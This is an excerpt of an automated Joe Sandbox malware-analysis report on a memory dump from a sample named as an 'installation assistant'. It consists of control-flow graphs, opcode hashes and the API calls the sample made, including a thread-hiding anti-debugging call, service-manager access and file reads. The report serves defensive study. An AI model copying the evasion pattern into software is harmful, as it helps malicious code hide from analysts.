6bf4396a 7843->7848 7854 6bf43a87-6bf43aa7 7844->7854 7855 6bf43aa9-6bf43ab0 7844->7855 7845->7844 7851 6bf43b24-6bf43b44 7846->7851 7852 6bf43b49-6bf43b50 7846->7852 7847->7821 7856 6bf43ba1-6bf43bb6 7848->7856 7849->7840 7857 6bf43af1-6bf43af8 7849->7857 7851->7854 7852->7830 7861 6bf43b56-6bf43b5d 7852->7861 7854->7855 7855->7843 7859 6bf43bc0-6bf43bda call 6c091470 call 6c091480 7856->7859 7863 6bf43b62-6bf43b85 7857->7863 7864 6bf43afa-6bf43aff 7857->7864 7872 6bf43be0-6bf43bfe 7859->7872 7861->7843 7863->7840 7868 6bf43b8b 7863->7868 7864->7841 7868->7856 7875 6bf43c04-6bf43c11 7872->7875 7876 6bf43e7b 7872->7876 7877 6bf43c17-6bf43c20 7875->7877 7878 6bf43ce0-6bf43cea 7875->7878 7879 6bf43e81-6bf43ee0 call 6bf43750 GetCurrentThread NtSetInformationThread 7876->7879 7881 6bf43dc5 7877->7881 7882 6bf43c26-6bf43c2d 7877->7882 7883 6bf43cec-6bf43d0c 7878->7883 7884 6bf43d3a-6bf43d3c 7878->7884 7894 6bf43eea-6bf43f04 call 6c091470 call 6c091480 7879->7894 7886 6bf43dc6 7881->7886 7887 6bf43dc3 7882->7887 7888 6bf43c33-6bf43c3a 7882->7888 7889 6bf43d90-6bf43d95 7883->7889 7890 6bf43d70-6bf43d8d 7884->7890 7891 6bf43d3e-6bf43d45 7884->7891 7895 6bf43dc8-6bf43dcc 7886->7895 7887->7881 7896 6bf43e26-6bf43e2b 7888->7896 7897 6bf43c40-6bf43c5b 7888->7897 7892 6bf43d97-6bf43db8 7889->7892 7893 6bf43dba-6bf43dc1 7889->7893 7890->7889 7898 6bf43d50-6bf43d57 7891->7898 7892->7881 7893->7887 7899 6bf43dd7-6bf43ddc 7893->7899 7915 6bf43f75-6bf43fa1 7894->7915 7895->7872 7904 6bf43dd2 7895->7904 7901 6bf43e31 7896->7901 7902 6bf43c7b-6bf43cd0 7896->7902 7903 6bf43e1b-6bf43e24 7897->7903 7898->7886 7905 6bf43e36-6bf43e3d 7899->7905 7906 6bf43dde-6bf43e17 7899->7906 7901->7859 7902->7898 7903->7895 7908 6bf43e76-6bf43e79 7904->7908 7911 6bf43e5c-6bf43e5f 7905->7911 7912 6bf43e3f-6bf43e5a 7905->7912 7906->7903 7908->7879 7911->7902 7914 6bf43e65-6bf43e69 7911->7914 7912->7903 7914->7895 7914->7908 7919 6bf44020-6bf44026 7915->7919 7920 6bf43fa3-6bf43fa8 7915->7920 7921 6bf43f06-6bf43f35 7919->7921 7922 6bf4402c-6bf4403c 7919->7922 7923 6bf4407c-6bf44081 7920->7923 7924 6bf43fae-6bf43fcf 7920->7924 7926 6bf43f38-6bf43f61 7921->7926 7927 6bf440b3-6bf440b8 7922->7927 7928 6bf4403e-6bf44058 7922->7928 7925 6bf440aa-6bf440ae 7923->7925 7929 6bf44083-6bf4408a 7923->7929 7924->7925 7931 6bf43f6b-6bf43f6f 7925->7931 7932 6bf43f64-6bf43f67 7926->7932 7927->7924 7930 6bf440be-6bf440c9 7927->7930 7933 6bf4405a-6bf44063 7928->7933 7929->7926 7934 6bf44090 7929->7934 7930->7925 7935 6bf440cb-6bf440d4 7930->7935 7931->7915 7936 6bf43f69 7932->7936 7937 6bf440f5-6bf4413f 7933->7937 7938 6bf44069-6bf4406c 7933->7938 7934->7894 7939 6bf440d6-6bf440f0 7935->7939 7940 6bf440a7 7935->7940 7936->7931 7937->7936 7942 6bf44144-6bf4414b 7938->7942 7943 6bf44072-6bf44077 7938->7943 7939->7933 7940->7925 7942->7931 7943->7932
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                                          • Instruction ID: 59afb264bfff17e612940b26b4fe49ec36c2c88d8e36a3867b4838c4ff3531be
                                                          • Opcode Fuzzy Hash: 774e4524b08e6f9c9ee917e0cf95a3b71113685da74bf84184b3fd2cf7c895ba
                                                          • Instruction Fuzzy Hash: 2A32C433245B018FC334CF28C890695BBE3EFD5314B698A6DC0EA5B666D779B44ACB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7969 6bf43a6a-6bf43a85 7970 6bf43a87-6bf43aa7 7969->7970 7971 6bf43aa9-6bf43ab0 7970->7971 7972 6bf43960-6bf43964 7971->7972 7973 6bf43860-6bf4388e 7972->7973 7974 6bf4396a 7972->7974 7984 6bf43894-6bf43896 7973->7984 7985 6bf43970-6bf4397d 7973->7985 7976 6bf43ba1-6bf43bb6 7974->7976 7977 6bf43bc0-6bf43bda call 6c091470 call 6c091480 7976->7977 7993 6bf43be0-6bf43bfe 7977->7993 7984->7985 7987 6bf4389c-6bf438b9 7984->7987 7988 6bf439f1-6bf439f8 7985->7988 7989 6bf4397f-6bf43989 7985->7989 7994 6bf438c0-6bf438c1 7987->7994 7991 6bf43ab5-6bf43aba 7988->7991 7992 6bf439fe-6bf43a03 7988->7992 7989->7987 7990 6bf4398f-6bf43994 7989->7990 7995 6bf43b16-6bf43b18 7990->7995 7996 6bf4399a-6bf4399f 7990->7996 7991->7987 8001 6bf43ac0-6bf43ac7 7991->8001 7997 6bf438d2-6bf438d4 7992->7997 7998 6bf43a09-6bf43a2f 7992->7998 8012 6bf43c04-6bf43c11 7993->8012 8013 6bf43e7b 7993->8013 8000 6bf4395e 7994->8000 7995->7994 8002 6bf439a5-6bf439bf 7996->8002 8003 6bf4383b-6bf43855 call 6c091470 call 6c091480 7996->8003 8007 6bf43957-6bf4395c 7997->8007 8004 6bf43a35-6bf43a3a 7998->8004 8005 6bf438f8-6bf43955 7998->8005 8000->7972 8001->7994 8008 6bf43acd-6bf43ad6 8001->8008 8009 6bf43a5a-6bf43a5d 8002->8009 8003->7973 8010 6bf43a40-6bf43a57 8004->8010 8011 6bf43b1d-6bf43b22 8004->8011 8005->8007 8007->8000 8008->7995 8014 6bf43ad8-6bf43aeb 8008->8014 8009->7970 8009->7971 8010->8009 8016 6bf43b24-6bf43b44 8011->8016 8017 6bf43b49-6bf43b50 8011->8017 8018 6bf43c17-6bf43c20 8012->8018 8019 6bf43ce0-6bf43cea 8012->8019 8021 6bf43e81-6bf43ee0 call 6bf43750 GetCurrentThread NtSetInformationThread 8013->8021 8014->8005 8020 6bf43af1-6bf43af8 8014->8020 8016->7970 8017->7994 8025 6bf43b56-6bf43b5d 8017->8025 8026 6bf43dc5 8018->8026 8027 6bf43c26-6bf43c2d 8018->8027 8028 6bf43cec-6bf43d0c 8019->8028 8029 6bf43d3a-6bf43d3c 8019->8029 8030 6bf43b62-6bf43b85 8020->8030 8031 6bf43afa-6bf43aff 8020->8031 8043 6bf43eea-6bf43f04 call 6c091470 call 6c091480 8021->8043 8025->7972 8034 6bf43dc6 8026->8034 8036 6bf43dc3 8027->8036 8037 6bf43c33-6bf43c3a 8027->8037 8038 6bf43d90-6bf43d95 8028->8038 8039 6bf43d70-6bf43d8d 8029->8039 8040 6bf43d3e-6bf43d45 8029->8040 8030->8005 8035 6bf43b8b 8030->8035 8031->8007 8044 6bf43dc8-6bf43dcc 8034->8044 8035->7976 8036->8026 8045 6bf43e26-6bf43e2b 8037->8045 8046 6bf43c40-6bf43c5b 8037->8046 8041 6bf43d97-6bf43db8 8038->8041 8042 6bf43dba-6bf43dc1 8038->8042 8039->8038 8047 6bf43d50-6bf43d57 8040->8047 8041->8026 8042->8036 8048 6bf43dd7-6bf43ddc 8042->8048 8064 6bf43f75-6bf43fa1 8043->8064 8044->7993 8053 6bf43dd2 8044->8053 8050 6bf43e31 8045->8050 8051 6bf43c7b-6bf43cd0 8045->8051 8052 6bf43e1b-6bf43e24 8046->8052 8047->8034 8054 6bf43e36-6bf43e3d 8048->8054 8055 6bf43dde-6bf43e17 8048->8055 8050->7977 8051->8047 8052->8044 8057 6bf43e76-6bf43e79 8053->8057 8060 6bf43e5c-6bf43e5f 8054->8060 8061 6bf43e3f-6bf43e5a 8054->8061 8055->8052 8057->8021 8060->8051 8063 6bf43e65-6bf43e69 8060->8063 8061->8052 8063->8044 8063->8057 8068 6bf44020-6bf44026 8064->8068 8069 6bf43fa3-6bf43fa8 8064->8069 8070 6bf43f06-6bf43f35 8068->8070 8071 6bf4402c-6bf4403c 8068->8071 8072 6bf4407c-6bf44081 8069->8072 8073 6bf43fae-6bf43fcf 8069->8073 8075 6bf43f38-6bf43f61 8070->8075 8076 6bf440b3-6bf440b8 8071->8076 8077 6bf4403e-6bf44058 8071->8077 8074 6bf440aa-6bf440ae 8072->8074 8078 6bf44083-6bf4408a 8072->8078 8073->8074 8080 6bf43f6b-6bf43f6f 8074->8080 8081 6bf43f64-6bf43f67 8075->8081 8076->8073 8079 6bf440be-6bf440c9 8076->8079 8082 6bf4405a-6bf44063 8077->8082 8078->8075 8083 6bf44090 8078->8083 8079->8074 8084 6bf440cb-6bf440d4 8079->8084 8080->8064 8085 6bf43f69 8081->8085 8086 6bf440f5-6bf4413f 8082->8086 8087 6bf44069-6bf4406c 8082->8087 8083->8043 8088 6bf440d6-6bf440f0 8084->8088 8089 6bf440a7 8084->8089 8085->8080 8086->8085 8091 6bf44144-6bf4414b 8087->8091 8092 6bf44072-6bf44077 8087->8092 8088->8082 8089->8074 8091->8080 8092->8081
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                                          • Instruction ID: ab7aa1011ceff4506394b6351b08b95281a1150b487f92f5837ad1ba442abbc5
                                                          • Opcode Fuzzy Hash: 21e1a19b8a1d9ded58c1b88d4c095aa84b7ab22c6ea79fc62aae39f2378b6325
                                                          • Instruction Fuzzy Hash: 6E51C1335447018FD3308F28C4807D5BBE3BF95314F698A6DC0E65B6A6DB79B44A8B51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                                          • Instruction ID: 4014eebf325d4c710564b06a9eb85b1691d66c16e54d0f856b44d81acc025282
                                                          • Opcode Fuzzy Hash: e7b4f3687a98244d2fbd806b1020315a4a23be479357c4b26395bd96f2d12aa2
                                                          • Instruction Fuzzy Hash: 5951B333504B118FD330CF28C480795BBE3BF95314F658A6DC0E65B6A6DB79B44A8B51
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                                          • Instruction ID: 3d4dd3b0884c6f20aa22afd36e391670539d840ef3cbbec3cfa830bccfd9e0c1
                                                          • Opcode Fuzzy Hash: ff5521e9bf1198e1d10ee356fea44c4df00d9782536ed8d2d5bbf10ae74db4b2
                                                          • Instruction Fuzzy Hash: D531E133649B01CBD730CF28C8847C6BBA3AF96314F154A6DC0A65B6A2DB7974099B51
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                                          • Instruction ID: 6bf8a384f14df3466f3807ac1f142a21085414fd86bf4a892959dfca9bb1b73a
                                                          • Opcode Fuzzy Hash: 5efd231b808bec64e939ccd8aabcd2507ae089ebc4fdad8a0c98960cd04b2722
                                                          • Instruction Fuzzy Hash: 1631EF33108B01CBD734CF28C490796BBB6AF96304F254A6DC0EA5B2A6DB7974498B51
                                                          APIs
                                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0C5130
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                                          • Instruction ID: 276ea8ff09ed4d7a2cbefdec9af00a980189ad76ce56daa0fd2b30805fda045c
                                                          • Opcode Fuzzy Hash: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                                          • Instruction Fuzzy Hash: E0312AB8608351EFC7108F28C548B0EBBF0EB89B54F51895EF988C6360C371C945AB53
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                                          • Instruction ID: d789932a80e930c41b5f1d077c321694e39bd6cc2d605965f7ee55d8831fde09
                                                          • Opcode Fuzzy Hash: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                                          • Instruction Fuzzy Hash: 6321F733118701CBD734CF28C890796BFB6AF86304F144A2DD0A6572A2DF7974048B51
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(?,?), ref: 6C0BAEDC
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                                          • Instruction ID: 5c7a427db91109efa55fe9784d8214cf71f6c3ed6644c7bdace0f213e6d74acc
                                                          • Opcode Fuzzy Hash: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                                          • Instruction Fuzzy Hash: A51166B0408362AFD710CB68D44469EBBE4BF86314F248E59F0A8DB690D335CC848B26
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C09ABA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                                          • API String ID: 2738559852-1563143607
                                                          • Opcode ID: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                                          • Instruction ID: 4fcb24f697c6b72885c7ef9fcf67624e9ca5f60716de709afc124eb71c058960
                                                          • Opcode Fuzzy Hash: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                                          • Instruction Fuzzy Hash: A6624770A0D3818FC724CF18C490B5EBBE2ABDA314F24991EE9A9CB751D734D945AB43

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6824 6c0dcad3-6c0dcae3 6825 6c0dcafd-6c0dcaff 6824->6825 6826 6c0dcae5-6c0dcaf8 call 6c0cf9df call 6c0cf9cc 6824->6826 6828 6c0dcb05-6c0dcb0b 6825->6828 6829 6c0dce64-6c0dce71 call 6c0cf9df call 6c0cf9cc 6825->6829 6842 6c0dce7c 6826->6842 6828->6829 6832 6c0dcb11-6c0dcb37 6828->6832 6847 6c0dce77 call 6c0d0120 6829->6847 6832->6829 6835 6c0dcb3d-6c0dcb46 6832->6835 6838 6c0dcb48-6c0dcb5b call 6c0cf9df call 6c0cf9cc 6835->6838 6839 6c0dcb60-6c0dcb62 6835->6839 6838->6847 6840 6c0dcb68-6c0dcb6b 6839->6840 6841 6c0dce60-6c0dce62 6839->6841 6840->6841 6845 6c0dcb71-6c0dcb75 6840->6845 6846 6c0dce7f-6c0dce82 6841->6846 6842->6846 6845->6838 6849 6c0dcb77-6c0dcb8e 6845->6849 6847->6842 6853 6c0dcbdf-6c0dcbe5 6849->6853 6854 6c0dcb90-6c0dcb93 6849->6854 6855 6c0dcbab-6c0dcbc2 call 6c0cf9df call 6c0cf9cc call 6c0d0120 6853->6855 6856 6c0dcbe7-6c0dcbf1 6853->6856 6857 6c0dcb95-6c0dcb9e 6854->6857 6858 6c0dcba3-6c0dcba9 6854->6858 6891 6c0dcd97 6855->6891 6859 6c0dcbf8-6c0dcc16 call 6c0d47f5 call 6c0d47bb * 2 6856->6859 6860 6c0dcbf3-6c0dcbf5 6856->6860 6861 6c0dcc63-6c0dcc73 6857->6861 6858->6855 6862 6c0dcbc7-6c0dcbda 6858->6862 6895 6c0dcc18-6c0dcc2e call 6c0cf9cc call 6c0cf9df 6859->6895 6896 6c0dcc33-6c0dcc5c call 6c0dac69 6859->6896 6860->6859 6864 6c0dcc79-6c0dcc85 6861->6864 6865 6c0dcd38-6c0dcd41 call 6c0e19e5 6861->6865 6862->6861 6864->6865 6868 6c0dcc8b-6c0dcc8d 6864->6868 6879 6c0dcdb4 6865->6879 6880 6c0dcd43-6c0dcd55 6865->6880 6868->6865 6872 6c0dcc93-6c0dccb7 6868->6872 6872->6865 6876 6c0dccb9-6c0dcccf 6872->6876 6876->6865 6882 6c0dccd1-6c0dccd3 6876->6882 6884 6c0dcdb8-6c0dcdd0 ReadFile 6879->6884 6880->6879 6881 6c0dcd57-6c0dcd66 GetConsoleMode 6880->6881 6881->6879 6886 6c0dcd68-6c0dcd6c 6881->6886 6882->6865 6887 6c0dccd5-6c0dccfb 6882->6887 6889 6c0dce2c-6c0dce37 GetLastError 6884->6889 6890 6c0dcdd2-6c0dcdd8 6884->6890 6886->6884 6892 6c0dcd6e-6c0dcd88 ReadConsoleW 6886->6892 6887->6865 6894 6c0dccfd-6c0dcd13 6887->6894 6897 6c0dce39-6c0dce4b call 6c0cf9cc call 6c0cf9df 6889->6897 6898 6c0dce50-6c0dce53 6889->6898 6890->6889 6899 6c0dcdda 6890->6899 6893 6c0dcd9a-6c0dcda4 call 6c0d47bb 6891->6893 6902 6c0dcda9-6c0dcdb2 6892->6902 6903 6c0dcd8a GetLastError 6892->6903 6893->6846 6894->6865 6907 6c0dcd15-6c0dcd17 6894->6907 6895->6891 6896->6861 6897->6891 6904 6c0dce59-6c0dce5b 6898->6904 6905 6c0dcd90-6c0dcd96 call 6c0cf9f2 6898->6905 6901 6c0dcddd-6c0dcdef 6899->6901 6901->6893 6912 6c0dcdf1-6c0dcdf5 6901->6912 6902->6901 6903->6905 6904->6893 6905->6891 6907->6865 6915 6c0dcd19-6c0dcd33 6907->6915 6918 6c0dce0e-6c0dce19 6912->6918 6919 6c0dcdf7-6c0dce07 call 6c0dcefe 6912->6919 6915->6865 6924 6c0dce1b call 6c0dce83 6918->6924 6925 6c0dce25-6c0dce2a call 6c0dd1b6 6918->6925 6930 6c0dce0a-6c0dce0c 6919->6930 6931 6c0dce20-6c0dce23 6924->6931 6925->6931 6930->6893 6931->6930
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
                                                          • Instruction ID: 9e23766200c2eddb9da858e99af33fecd5a3cc8727d7228e74a469e9ae89f459
                                                          • Opcode Fuzzy Hash: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
